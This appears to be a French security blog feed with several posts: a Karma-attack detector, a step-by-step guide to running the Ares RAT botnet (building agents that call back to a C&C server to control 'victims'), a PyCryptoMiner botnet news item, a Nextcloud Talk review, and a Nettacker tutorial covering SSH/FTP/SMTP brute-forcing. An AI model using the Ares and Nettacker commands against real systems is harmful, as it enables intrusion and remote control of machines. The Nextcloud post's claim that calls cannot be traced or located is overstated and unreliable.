Si le script détecte une attaque Karma, celui-ci sauvegarde automatiquement des informations sur le point d’accès fake, puis emet des requêtes de désauthentification.
L’utilisation de PiKarma requiert deux adaptateurs WiFi. L’un, en mode moniteur qui surveillera le principal (en mode géré) qui sera utilisé pour les échanges avec le point d’accès.

Ci-dessous vous verrez une vidéo démo de PiKarma:

PiKarma est une partie d’un plus grand projet WiPi-Hunter qui fournit des outils Open Source détectant des attaques visant les réseaux WiFi.
Je vous invite à cliquer sur ce  lien pour consulter la liste de tous les outils.

mdestroy

The post PiKarma – Le script Python qui vous protège contre les attaques Karma appeared first on Homputer Security.

Comment contrôler un botnet avec Ares ?

$
0
0

Ares est un outil RAT écrit en Python qui peut être utilisé pour contrôler à distance plusieurs hôtes simultanément.
Cet outil est notamment composé de deux programmes:
_ Un serveur de commande et contrôle (C&C), qui est une interface graphique Web pour l’administration des agents (victimes),
_ un agent (ou backdoor), qui est exécuté sur l’hôte compromis assurant la communication avec le serveur C&C.
Dans ce billet, nous verrons comment utiliser Ares.

Installation

Pour installer Ares, clonez son repo Github:

# git clone https://github.com/sweetsoftware/Ares.git

Puis, installez les dépendances:

# cd ares
# pip install -r requirements

Ensuite, initialisez une base de données:

# cd server
# ./ares.py initdb

Pour la compilation des agents Windows, installez Wine à l’aide du script wine_setup.sh:

# ./wine-setup.sh

Exemple d’utilisation

Pour démarrer le serveur C&C, lancez le script ares.py situé dans le dossier ares/server comme suit:

# ./ares.py runserver -h 0.0.0.0 -p 8080 –threaded

Ouvrez votre naviguateur web puis connectez vous à l’adresse:

http://localhost:8080

Pour votre première connexion, il vous faudra créer un mot de passe.

Connectez-vous avec votre mot de passe…

…Et vous accéderez au menu d’accueil.

Passons à présent à la création des agents à l’aide du script builder.py situé dans le dossier ares/agent.
Pour créer un agent Windows, lancez la commande suivante:

# ./builder.py -p Linux --server http://adresse-ip-server:8080 -o nom-du-fichier-de-sortie

Pour la création d’un agent Linux, lancez la commande ci-dessous:

# ./builder.py -p Linux --server http://adresse-ip-server:8080 -o nom-du-fichier-de-sortie


-p pour le type de plateforme,
--server pour l’adresse d’écoute,
-o pour le nom du fichier de sortie.

Après l’exécution des agents par les victimes, vous verrez apparaître dans le menu Agents de votre serveur C&C une liste des systèmes infectés:

Lancez la commande help consulter la liste des commandes disponibles.

Vous serez en mesure de réaliser plusieurs choses, comme une capture de l’écran de votre victime, un upload d’un script, et bien d’autres…

Happy Hacking !

mdestroy

The post Comment contrôler un botnet avec Ares ? appeared first on Homputer Security.

Le botnet PyCryptoMiner transforme votre système Linux en mineur de crypto-monnaie

$
0
0



Les experts des réseaux F5 ont découvert un nouveau botnet de crypto-monnaies qui cible les systèmes Linux et se propage à travers le protocole SSH.

Pour infecter des serveurs SSH vulnérables, l’opérateur derrière le botnet nommé PyCryptoMiner, procède par des attaques par force brute. En cas de succès, celui-ci se sert de scripts Python pour l’installation d’un mineur de Monero, un type de crypto-monnaie beaucoup apprécié par les cyber-criminels.
A ce jour les pirates derrière ce botnet auraient touché au moins $60000.

Pour mener à bien ses opérations, l’auteur du botnet a eu recours à des techniques ingénieuses.
Au lieu de fichiers binaires malicieux, il a plutôt utilisé des scripts Python pour la réalisation des opérations. Toute chose qui rend difficile la détection des attaques car contrairement aux fichiers binaires malicieux, les scripts peuvent être facilement obfusqués.

L’autre technique ingénieuse de l’opérateur du botnet est l’utilisation d’un lien PasteBin pour la mise à jour des adresses des serveurs commande et contrôle (C&C).
En effet, les malwares n’ont ordinairement aucun moyen de changer d’adresse de leur serveur C&C dans le cas où celui-ci devenait HS.
L’utilisation d’un lien public prolonge par contre la longévité du botnet. Car, même si les serveurs C&C devenaient Hors Service, une simple mise à jour du lien externe réactiverait le botnet.

Script Python. Source f5.com

Les noms de domaines utilisés par les serveurs C&C du botnet sont tous enregistrés par une même identité numérique nommée ‘Xinqian Rhys’. Cette identité serait liée à plus de 36000 domaines et 264 adresses mails impliqués dans des services pour adulte, des scams, et des paris.

Au moment de la rédaction de cet article, le botnet est Hors Service mais une simple mise à jour du lien PasteBin le réactivera. Les experts de f5 restent donc à l’affût.

Source: f5.com

mdestroy

The post Le botnet PyCryptoMiner transforme votre système Linux en mineur de crypto-monnaie appeared first on Homputer Security.

Nextcloud Talk – L’ alternative Open Source à Google Hangout et Skype

$
0
0

L’application d’auto-hébergement a récemment lancé une application VoIP qui peut être une bonne alternative Open Source à Google Hangout, Skype, ou d’autres services de communication similaire.

Nextcloud est un logiciel collaboratif libre et Open Source d’hébergement. En effet, ce logiciel permet de placer ses données quelque part sur Internet de telle sorte qu’elles soient accessibles depuis n’importe quel appareil connecté à Internet.
Sa fonctionnalité est similaire à Dropbox, Google Drive, etc.. Mais à la différence de ces solutions propriétaires, l’architecture libre de Nextcloud permet l’ajout de fonctionnalités supplémentaires sous forme d’application et aux utilisateurs d’avoir un contôle total de leurs fichiers.

Nextcloud Talk est une nouvelle application de Nextcloud qui vous permettra de communiquer avec vos correspondants grâce à des appels vidéos et audio. Cette application utilise la technologie WebRTC pour vos communications audio et vidéo, supporte le partage de fichiers et d’écran, un service de messagerie instantannée. Ce nouveau service de Nextcloud fonctionne avec tous les navigateurs modernes. Il existe également des clients Desktop (Windows, Linux, macOS) et des clients mobiles (iOS, Android).

Après avoir installé une instance Nextcloud sur votre serveur, vous trouverez l’application Nextcloud Talk dans la liste d’applications.

Avec Nextcloud Talk, il est également possible de joindre des correspondants qui ne sont pas sur Nextcloud.
Pour cela, il vous suffira de générer un lien et de le partager à votre correspondant.

Les appels sont chiffrés de bout en bout. En d’autres termes, personne ne pourra tracer vos appels ni vous localiser.

mdestroy

The post Nextcloud Talk – L’ alternative Open Source à Google Hangout et Skype appeared first on Homputer Security.

Comment réaliser des scans réseaux avec Nettacker ?

$
0
0

Nettacker est un framework permettant d’automatiser des tests pour la collecte d’informations et la découverte de vulnérabilités online.
Le programme utilise des scans du type TCP SYN/ACK, ICMP et bien d’autres pour contourner les pare-feux, les IDS/IPS et détecter les ports ouverts sur des systèmes ciblés.
Nettacker peut être aussi utilisé pour effectuer des attaques par force brute sur les services SSH, FTP, SMTP.
Nettacker est écrit en Python.

Installation

Pour installer Nettacker, clonez son repo Github:

# git clone https://github.com/viraintel/OWASP-Nettacker.git

Installez les dépendances:

# cd Nettacker
# pip install -r requirements.txt

Puis, lancez le script nettacker.py:

# python nettacker.py

Voici le menu d’aide de Nettacker:

   ______          __      _____ _____
  / __ \ \        / /\    / ____|  __ \
 | |  | \ \  /\  / /  \  | (___ | |__) |
 | |  | |\ \/  \/ / /\ \  \___ \|  ___/
 | |__| | \  /\  / ____ \ ____) | |     Version 0.0.1
  \____/   \/  \/_/    \_\_____/|_|     SAME
                          _   _      _   _             _
                         | \ | |    | | | |           | |
  github.com/viraintel   |  \| | ___| |_| |_ __ _  ___| | _____ _ __
  owasp.org              | . ` |/ _ \ __| __/ _` |/ __| |/ / _ \ '__|
  viraintel.com          | |\  |  __/ |_| || (_| | (__|   <  __/ |
                         |_| \_|\___|\__|\__\__,_|\___|_|\_\___|_|



usage: Nettacker [-L LANGUAGE] [-v VERBOSE_LEVEL] [-V] [-c] [-o LOG_IN_FILE]
                 [--graph GRAPH_FLAG] [-h] [-W] [--profile PROFILE]
                 [-i TARGETS] [-l TARGETS_LIST] [-m SCAN_METHOD]
                 [-x EXCLUDE_METHOD] [-u USERS] [-U USERS_LIST] [-p PASSWDS]
                 [-P PASSWDS_LIST] [-g PORTS] [-T TIMEOUT_SEC] [-w TIME_SLEEP]
                 [-r] [-s] [-t THREAD_NUMBER] [-M THREAD_NUMBER_HOST]
                 [-R SOCKS_PROXY] [--retries RETRIES] [--ping-before-scan]
                 [--method-args METHODS_ARGS] [--method-args-list]

Engine:
  Engine input options

  -L LANGUAGE, --language LANGUAGE
                        select a language ['el', 'fr', 'en', 'nl', 'ps', 'tr',
                        'de', 'ko', 'it', 'ja', 'fa', 'hy', 'ar', 'zh-cn',
                        'vi', 'ru', 'hi', 'ur', 'id', 'es']
  -v VERBOSE_LEVEL, --verbose VERBOSE_LEVEL
                        verbose mode level (0-5) (default 0)
  -V, --version         show software version
  -c, --update          check for update
  -o LOG_IN_FILE, --output LOG_IN_FILE
                        save all logs in file (results.txt, results.html,
                        results.json)
  --graph GRAPH_FLAG    build a graph of all activities and information, you
                        must use HTML output. available graphs:
                        ['d3_tree_v1_graph', 'd3_tree_v2_graph',
                        'jit_circle_v1_graph']
  -h, --help            Show Nettacker Help Menu
  -W, --wizard          start wizard mode
  --profile PROFILE     select profile ['information_gathering', 'all']

Target:
  Target input options

  -i TARGETS, --targets TARGETS
                        target(s) list, separate with ","
  -l TARGETS_LIST, --targets-list TARGETS_LIST
                        read target(s) from file

Method:
  Scan method options

  -m SCAN_METHOD, --method SCAN_METHOD
                        choose scan method ['ftp_brute', 'smtp_brute',
                        'ssh_brute', 'dir_scan', 'subdomain_scan',
                        'tcp_connect_port_scan',
                        'viewdns_reverse_ip_lookup_scan', 'all']
  -x EXCLUDE_METHOD, --exclude EXCLUDE_METHOD
                        choose scan method to exclude ['ftp_brute',
                        'smtp_brute', 'ssh_brute', 'dir_scan',
                        'subdomain_scan', 'tcp_connect_port_scan',
                        'viewdns_reverse_ip_lookup_scan']
  -u USERS, --usernames USERS
                        username(s) list, separate with ","
  -U USERS_LIST, --users-list USERS_LIST
                        read username(s) from file
  -p PASSWDS, --passwords PASSWDS
                        password(s) list, separate with ","
  -P PASSWDS_LIST, --passwords-list PASSWDS_LIST
                        read password(s) from file
  -g PORTS, --ports PORTS
                        port(s) list, separate with ","
  -T TIMEOUT_SEC, --timeout TIMEOUT_SEC
                        read passwords(s) from file
  -w TIME_SLEEP, --time-sleep TIME_SLEEP
                        time to sleep between each request
  -r, --range           scan all IPs in the range
  -s, --sub-domains     find and scan subdomains
  -t THREAD_NUMBER, --thread-connection THREAD_NUMBER
                        thread numbers for connections to a host
  -M THREAD_NUMBER_HOST, --thread-hostscan THREAD_NUMBER_HOST
                        thread numbers for scan hosts
  -R SOCKS_PROXY, --socks-proxy SOCKS_PROXY
                        outgoing connections proxy (socks). example socks5:
                        127.0.0.1:9050, socks://127.0.0.1:9050,
                        socks5://127.0.0.1:9050 or socks4:
                        socks4://127.0.0.1:9050, authentication:
                        socks://username:password@127.0.0.1,
                        socks4://username:password@127.0.0.1,
                        socks5://username:password@127.0.0.1
  --retries RETRIES     Retries when the connection timeout (default 3)
  --ping-before-scan    ping before scan the host
  --method-args METHODS_ARGS
                        enter methods inputs, example: "ftp_brute_users=test,a
                        dmin&ftp_brute_passwds=read_from_file:/tmp/pass.txt&ft
                        p_brute_port=21"
  --method-args-list    list all methods args


Please read license and agreements https://github.com/viraintel/OWASP-Nettacker

Exemples d’utilisation

L’option i sert à spécifier l’hôte ciblé,
l’option t permet de préciser le nombre de processus à utiliser,
l’option m pour le type de scan,
l’option o pour spécifier un fichier de sortie et le format visé (html, json, txt). Par défaut, tous les résultats sont stockés dans le dossier nettacker/results au format html.

Les options U et P permettent de passer au script respectivement une liste d’utilisateurs et une liste de mots de passe.

L’option g permet de spécifier un ensemble de ports,
l’option R permet d’utiliser un proxy pour les scans.

Happy Hacking !

mdestroy

The post Comment réaliser des scans réseaux avec Nettacker ? appeared first on Homputer Security.

Viewing all 97 articles
Browse latest View live